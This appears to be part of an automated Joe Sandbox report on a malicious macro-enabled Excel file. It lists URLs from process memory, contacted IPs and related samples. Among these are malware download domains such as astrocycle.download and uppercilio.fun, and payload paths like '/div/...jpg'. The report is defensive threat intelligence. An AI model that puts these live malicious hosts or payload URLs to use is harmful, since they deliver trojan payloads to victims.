                        https://a0.awsstatic.com/libra/1.0.385/directoriesregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                          		high
                          https://aws.amazon.com/terms/?nc1=f_prregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                            		high
                            https://img.youtube.comregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                              		high
                              https://media.amazonwebservices.comregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                		high
                                https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gifregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                  		high
                                  https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.htmlregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                    		high
                                    https://c0.b0.p.awsstatic.comregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                      		high
                                      https://static-cdn.jtvnw.netregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                        		high
                                        https://aws.amazon.com/cn/regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                          		high
                                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://a0.awsstatic.com/libra-css/imagesregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                            		high
                                            https://a0.awsstatic.com/libra/1.0.385/librastandardlibregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                              		high
                                              https://anchor.fmregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                                		high
                                                https://a0.awsstatic.com/psf/nullregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://dts.podtrac.comregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://aws.amazon.com/ar/regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-homregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://pages.awscloud.com/zillow-case-study?hp=tile&amp;story=zllwregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://pages.awscloud.com/communication-preferences?trk=homepageregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://ocsp.rootg2.amazontrust.com08regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109583680.0000000000220000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://aws.amazon.com/cn/?nc1=h_lsregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://dpm.demdex.netregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=defaultregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://aws.amazon.com/ru/regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://www.buzzsprout.com;regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		low
                                                                  https://aws.amazon.com/tw/?nc1=h_lsregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowserregsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://i18n-string.us-west-2.prod.pricing.aws.a2z.comregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://aws.amazon.com/ko/regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://aws.amazon.com/ru/?nc1=h_lsregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://a0.awsstatic.com/libra-css/images/site/fav/favicon.icoregsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://aws.amazon.com/es/regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://crl.sca1b.amazontrust.com/sca1b.crl0regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109666116.000000000034E000.00000004.00000020.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://d1le29qyzha1u4.cloudfront.netregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://docs.aws.amazon.com/index.html?nc2=h_ql_docregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://aws.amazon.com/ar/?nc1=h_lsregsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2102507557.0000000001DA0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109819947.0000000001D10000.00000002.00000001.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		low
                                                                                      https://p.adsymptotic.comregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://aws.amazon.com/th/regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://docs.aws.amazon.comregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://www.windows.com/pctv.regsvr32.exe, 00000003.00000002.2105066388.00000000030F0000.00000002.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://a0.awsstatic.com/pricing-calculator/js/1.0.2regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://a0.awsstatic.com/plc/js/1.0.112/plcregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://aws.amazon.com/marketplace/?nc2=h_moregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://d2a6igt6jhaluh.cloudfront.netregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://ocsp.sca1b.amazontrust.com06regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109666116.000000000034E000.00000004.00000020.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://amazon.com/regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmpfalse
                                                                                                        		high
                                                                                                        https://amazon.com/4Iregsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.pngregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            https://console.aws.amazon.com/support/home/?nc2=h_ql_curegsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://crt.rootg2.amazontrust.com/rootregsvr32.exe, 00000003.00000003.2098034519.000000000032C000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0regsvr32.exe, 00000003.00000003.2098034519.000000000032C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109666116.000000000034E000.00000004.00000020.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://aws.amazon.com/search/regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credentialregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://aws.amazon.com/?nc2=h_lgregsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://ocsp.rootca1.amazontrust.com0:regsvr32.exe, 00000003.00000003.2098034519.000000000032C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109666116.000000000034E000.00000004.00000020.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://console.aws.amazon.com/support/home/?nc1=f_drregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://aws.amazon.com/fr/regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://windowsmedia.com/redir/services.asp?WMPFriendly=trueregsvr32.exe, 00000003.00000002.2105380769.00000000032D7000.00000002.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        https://console.aws.amazon.com/console/home?nc1=f_ct&amp;src=footer-signin-mobileregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1Z10NXV9YPC16ZYC023HEX-Content-Tyregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://aws.amazon.com/vi/regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://mktg-apac.s3-ap-southeast-1.amazonaws.comregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://www.twitch.tv/awsregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://astrocycle.download/Q5ZDkxZTregsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://aws.amazon.com/marketplace/?nc2=h_ql_mpregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://aws.amazon.com/searchregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://a0.awsstatic.com/libra/1.0.385/libra-head.jsregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://crl.rootg2.amazontrust.com/rootg2.crl0regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109583680.0000000000220000.00000004.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000003.00000002.2103638650.0000000002D00000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2114595132.0000000002CB0000.00000002.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://d36cz9buwru1tt.cloudfront.netregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://a0.awsstatic.com/da/js/1.0.47/aws-da.jsregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://aws.amazon.com/tw/regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://aws.amazon.com/tr/?nc1=h_lsregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://console.aws.amazon.com/?nc2=h_m_mcregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://aws.amazon.com/fr/?nc1=h_lsregsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://awsmedia.s3.amazonaws.comregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://o.ss2.us/0regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109583680.0000000000220000.00000004.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://aws.amazon.com/search/?searchQuery=regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://a0.awsstatic.com/libra-search/1.0.13/jsregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://aws.amazon.com/privacy/?nc1=f_prregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://aws.amazon.com/pt/?nc1=h_lsregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://prod-us-west-2.csp-report.marketing.aws.dev/submitregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://aws.amazon.com/jp/?nc1=h_lsregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://aws.amazon.com/regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://d3ctxlq1ktw2nl.cloudfront.netregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://www.msnbc.com/news/ticker.txtregsvr32.exe, 00000003.00000002.2105066388.00000000030F0000.00000002.00000001.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.pngregsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.jsregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://amazonwebservices.d2.sc.omtrdc.netregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://aws.amazon.com/podcasts/aws-podcast/regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://d1yyh5dhdgifnx.cloudfront.netregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                                                                                                                                                                		high

                                                                                                                                                                                Contacted IPs

                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                Public

                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                172.67.198.51
                                                                                                                                                                                		thousandsyears.downloadUnited States
                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                13.224.92.73
                                                                                                                                                                                		dr49lng3n1n2s.cloudfront.netUnited States
                                                                                                                                                                                		16509AMAZON-02USfalse
                                                                                                                                                                                104.21.55.83
                                                                                                                                                                                		uppercilio.funUnited States
                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                172.67.213.115
                                                                                                                                                                                		astrocycle.downloadUnited States
                                                                                                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                                                                                                104.21.12.122
                                                                                                                                                                                		voopeople.funUnited States
                                                                                                                                                                                		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                General Information

                                                                                                                                                                                Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                                                Analysis ID:444703
                                                                                                                                                                                Start date:06.07.2021
                                                                                                                                                                                Start time:15:33:19
                                                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                                                Overall analysis duration:0h 7m 45s
                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                Report type:full
                                                                                                                                                                                Sample file name:sbf0127365-7431059.xlsm
                                                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                                Number of analysed new started processes analysed:7
                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                Technologies:
                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                • HDC enabled
                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                Classification:mal100.troj.expl.evad.winXLSM@7/8@15/5
                                                                                                                                                                                EGA Information:Failed
                                                                                                                                                                                HDC Information:
                                                                                                                                                                                • Successful, ratio: 73.6% (good quality ratio 60.1%)
                                                                                                                                                                                • Quality average: 72.6%
                                                                                                                                                                                • Quality standard deviation: 39.3%
                                                                                                                                                                                HCA Information:
                                                                                                                                                                                • Successful, ratio: 71%
                                                                                                                                                                                • Number of executed functions: 28
                                                                                                                                                                                • Number of non-executed functions: 3
                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                • Adjust boot time
                                                                                                                                                                                • Enable AMSI
                                                                                                                                                                                • Found application associated with file extension: .xlsm
                                                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                                • Attach to Office via COM
                                                                                                                                                                                • Scroll down
                                                                                                                                                                                • Close Viewer
                                                                                                                                                                                Warnings:
                                                                                                                                                                                Show All
                                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                Simulations

                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                No simulations

                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                IPs

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                172.67.198.51Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                                Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                                DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                                PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                                13.224.92.73Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      104.21.55.83Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • uppercilio.fun/div/44376,8555986111.jpg
                                                                                                                                                                                      Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • uppercilio.fun/div/44376,8555986111.jpg
                                                                                                                                                                                      DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • uppercilio.fun/div/44376,8555986111.jpg
                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • uppercilio.fun/div/44376,8555986111.jpg
                                                                                                                                                                                      172.67.213.115Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • astrocycle.download/
                                                                                                                                                                                      DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • astrocycle.download/
                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • astrocycle.download/

                                                                                                                                                                                      Domains

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                      astrocycle.downloadOutfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.37.209
                                                                                                                                                                                      Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.213.115
                                                                                                                                                                                      DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.213.115
                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.213.115
                                                                                                                                                                                      dr49lng3n1n2s.cloudfront.netOutfordelivery799862.xlsmGet hashmaliciousBrowse
